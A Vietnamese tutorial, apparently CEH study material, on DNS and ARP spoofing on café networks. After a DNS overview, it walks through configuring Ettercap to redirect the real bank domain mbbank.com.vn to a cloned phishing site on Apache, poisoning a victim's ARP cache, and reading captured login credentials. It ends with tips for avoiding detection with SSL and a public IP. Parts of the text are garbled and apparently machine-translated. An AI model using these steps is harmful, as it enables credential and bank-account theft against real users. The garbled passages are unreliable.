Những kỹ thuật tất công người dùng tại quán coffee – DNS Spoofing

TỔNG QUAN

DNS (Domain Name System – hệ thống phân giải tên miền) là một hệ thống giúp con người và máy tính giao tiếp dễ dàng hơn. Con người sử dụng tên, còn máy tính sử dụng số, DNS chính là một hệ thống giúp biên dịch tên máy chủ (tên miền) thành số để máy tính có thể hiểu được.

Cơ bản, DNS là một trang web tên giúp biên dịch cơ sở dữ liệu hệ thống thành địa chỉ IP. Thông tin từng ứng dụng tên miền với IP địa chỉ được ghi lại trong một “danh sách thư viện”, và thư viện này được lưu trên các tên miền máy chủ.

DNS hoạt động như thế nào?

DNS active từng bước theo cấu trúc của DNS. Bước đầu tiên được gọi là  truy vấn DNS , một truy vấn để lấy thông tin.

Chúng tôi sử dụng ngôn ngữ tìm kiếm trang web bằng cách nhập tên miền vào trong trình duyệt web (ví dụ,  www.google.com ). Đầu tiên, máy chủ DNS sẽ tìm kiếm phân tích thông tin trong  filehosts  – một văn bản tệp trong hệ thống máy chủ có trách nhiệm chuyển đổi thành IP địa chỉ. Nếu không thấy thông tin, nó sẽ tìm bộ nhớ đệm quan trọng  – bộ nhớ đệm  của phần cứng hoặc phần mềm. Nơi phổ biến nhất lưu này cache thông tin là cache của trình duyệt  và cache   của  Internet Service Provider  (ISP). Nếu không nhận được thông tin, bạn sẽ thấy hiện lên lỗi mã.

Tổng cộng có máy chủ loại 4 tham gia vào trong miền tên miền phân tích hệ thống

• Trình đệ quy DNS

Đệ quy DNS là máy chủ đóng vai trò liên lạc với các máy chủ khác để thay thế nó làm nhiệm vụ phản hồi cho khách hàng (người dùng browser). Nó giống như một nhân viên cần mẫn nhận nhiệm vụ và trả thông tin cho khách hàng (trình duyệt) để tìm đúng thông tin mà họ cần. To get information, DNS recursor may be will be call to  Root DNS Server  để được trợ giúp.

• Máy chủ tên gốc

Root DNS Server, cũng thường được gọi là máy chủ định danh, là máy chủ quan trọng nhất trong hệ thống DNS. Nó không có công cụ tên. Bạn có thể hiểu nó là một thư viện để định hướng tìm kiếm giúp bạn.

Thực tế, trình phân giải đệ quy DNS sẽ chuyển yêu cầu tới Máy chủ tên  gốc . Sau đó, máy chủ này sẽ phản hồi rằng nó cần tìm trong các máy chủ tên miền cấp cao nhất (TLD nameserver) cụ thể.

• Máy chủ định danh TLD

Khi bạn muốn truy cập Google hoặc Facebook, bạn sẽ sử dụng phần mở rộng thường là  .com . Nó là một trong tên miền cấp cao nhất. Máy chủ cho miền cấp cao nhất loại này được gọi là máy chủ định danh TLD. Nó chịu trách nhiệm toàn bộ thông tin quản lý của một chung tên miền mở rộng phần.

Ví dụ như khi bạn nhập  www.google.com  trên trình duyệt, TLD  .com  sẽ phản hồi từ một trình phân giải DNS để giới thiệu cho nó một  máy chủ DNS có thẩm quyền. Máy chủ định danh ủy quyền  là định thức chính chứa dữ liệu nguồn của tên miền đó.

• Máy chủ tên ủy quyền

Khi một trình phân giải DNS tìm thấy một máy chủ tên có thẩm quyền, đây là diễn đàn tên miền phân tích. Máy chủ định danh có thẩm quyền có chứa miền tên thông tin gắn với địa chỉ nào. Nó sẽ được cung cấp cho trình phân giải đệ quy, địa chỉ IP cần được tìm thấy trong danh sách các bản ghi của nó.

DNS Spoofing là gì?

Có rất ít dấu hiệu để nhận biết DNS Spoofing. Trong công cụ tấn công lớn, người dùng sẽ không thể biết rằng mình đang bị lừa nhập các thông tin quan trọng vào một trang web giả mạo cho đến khi ngân hàng gọi cho bạn và hỏi “Tại sao rút lại nhiều tiền vậy? ”.

DNS Spoofing  (tên tiếng anh là  DNS cache mining)  là một máy tính bảo mật hack định dạng trong đó miền tên hệ thống dữ liệu bị lỗi được đưa vào bộ đệm của DNS phân tích, làm cho tên máy chủ trả về bản ghi không chính xác kết quả. This path to save the quality access is redirect to the computer of the attack (or any other computer).

Khi đó, người dùng truy cập đến địa chỉ mong muốn nhưng sẽ được gửi đến một IP giả mạo địa chỉ. This IP Giả mạo địa chỉ đã được kẻ tấn công tạo ra trước đó với mục tiêu ăn cắp ngân sách tài khoản của người dùng.

Quá trình giả mạo DNS công ty

 sơ đồ

 

Bước 1: Hacker sử dụng kỹ thuật máy chủ DNS giả lập để đầu máy victim độc

Bước 2: Hacker cài đặt trang web mã nguồn giả mạo bằng apache2 và phpmysql

Bước 3: Hacker sẽ tạo một trang web giả mạo trang web của ngân hàng

Bước 4: Hacker sử dụng kỹ thuật Network Scanning để dò tìm tất cả các ip, MAC trong mạng

Bước 5: Hacker chọn các đầu độc,  tấn công bằng cách sử dụng ARP spoofing để ARP cache đầu độc

Bước 6: Victim khi truy cập vào trang web sẽ được chuyển hướng đến trang web giả mạo của Hacker

Bước 7: Nạn nhân đăng nhập tài khoản, mật khẩu sẽ bị Hacker lấy hết thông tin.

Bước 8: Hacker tìm kiếm thông tin mà có vittim máy độc

Chuẩn bị:

Hacker: Kali linux 2019.3 trở lên, đã cập nhật, có cài Ettercap 0.8.3 trở lên

Vittim: Bản cập nhật Windows 10 mới nhất 20h2, bản cập nhật Chrome mới nhất.

Bước 1. Hacker sử dụng kỹ thuật máy chủ DNS giả lập để đầu máy vittim độc

su root
cd /etc/ettercap
ls
vi etter.conf

• enter : set nu để đánh số dòng đầu ký tự, tìm đến dòng 16, 17. change only number
  ec_uid = 65535 thành ec_uid = 0
ec_hid = 65535 thành ec_hid =0

Bấm ESC ,: x đề exit

• Enter File etter.dns để cấu hình tên miền giả lập
  vi etter.dns

enter : thiết lập các dòng ký tự đầu tiên, tìm đến các dòng 59, 60, 61 thêm thông tin sau:
mbbank.com.vn     A     172.10.1.100
*.mbbank.com.vn  A     172.10.1.100
mbbank.com.vn     PTR  172.10.1.100 [TTL]

Bấm ESC ,: x đề exit

Bước 2. Hacker cài đặt trang web nguồn mã giả mạo bằng apache2 và phpmysql

• Hacker sẽ cài đặt apache2 gói
  apt install apache2 -y

• Khởi động apache2 service
  systemctl start apache2

• Mở  google Chmore trình duyệt để kiểm tra: 172.10.1.100

• Install php libapache2-mod-php php-mysql
• sudo apt install php libapache2-mod-php php-mysql
• Install package php-clisudo apt install php-cli

Bước 3. Hacker sẽ tạo một trang web giả mạo giống trang web của ngân hàng

• Copy File mbbank vào trong var / www / html mục
  cp -r /home/kali/Desktop/mb-bank/* .

• Cấp quyền
  chmod 777 -R html

 

• Khởi động lại dịch vụ apache2
  systemctl restart apache2

• Hacker kiểm tra thử trang web giả mạo bằng cách vào IP trình duyệt: 172.10.1.100

Bước 4. Hacker sử dụng kỹ thuật Network Scanning để dò tìm tất cả các ip, MAC trong mạng

ettercap -G

• Chọn dấu tích như hình để bắt đầu quét IP + MAC máy tính.
• Chọn dấu 3 chấm -> máy chủ -> quét máy chủ

• Sau khi quét xong IP, hãy tạm dừng Ettercap lại như hình.

• Select IP host vittim có IP: 172.10.1.69. thêm vào Nhóm 1

• Thêm tuyến IP vào nhóm 2

• Chọn -> Plugin -> Quản lý plugin

• Nhấp đúp vào dns_spoof

Bước 5. Hacker chọn các đầu độc,  tấn công bằng cách sử dụng ARP spoofing để ARP cache đầu độc

• Tiếp theo ta sẽ tấn công  bằng cách giả mạo ARP chọn

• Để mặc định và vắt đầu nghe lén

• Bật nút Play và tiến hành bắt gói tin từ vittim

Lúc này hacker gửi phản hồi ARP liên tục cho nhân, các nhân sẽ bị đầu độc là IP (Hacker) Mac (Gateway). Khi truyền dữ liệu, hacker có thể nghe lén được.

Bước 6. Victim khi truy cập vào trang web sẽ được chuyển hướng đến trang web giả mạo của Hacker

• Vittim truy cập mbbank.com.vn

Bước 7. Nạn nhân đăng nhập tài khoản, mật khẩu sẽ bị Hacker lấy hết thông tin

• sau đó sẽ được trả về trang web địa chỉ mà hacker đã đặt trước đó

Bước 8: Hacker tìm kiếm thông tin mà có vittim máy độc

cd /var/www/html
ls -l
cat tk.txt

• Thông tin được hiển thị như sau:

Password: TrungThienIT.COM
VerificationCode:
TaiKhoan: admin

Lưu ý:

Theo kinh nghiệm của mình, nếu có nhân sự để ý thấy trang mbbank.com.vn khi truy cập không có SSL  chứng nhận mã hóa thì sẽ dễ dàng phát hiện được. Như vậy chúng ta phải đầu tư thật kỹ 1 chu kỳ chuẩn hệ thống, tấn công thì phải làm đến cùng. xây dựng hệ thống cấp phát SSL cho toàn hệ thống của chúng ta. 
Tìm hiểu Triển khai SSL / TLS và https với Open SSL và Let’s Encrypt . 

Hai là thay đổi nội dung IP thành IP công cộng cùng bên mbbank.com.vn [103.12.104.72] Nghĩa là thay đổi IP khác IP private. như vậy vittim cũng khó mà phát hiện ra.

Trên đây là hướng dẫn về cách giả mạo DNS trong CEHv11 phần. các bạn suy nghĩ thật kỹ trước khi làm. Nhắc lại mình , đây là tài liệu tham khảo không có ý kiến ​​chỉ dẫn.
Cảm ơn bạn đã xem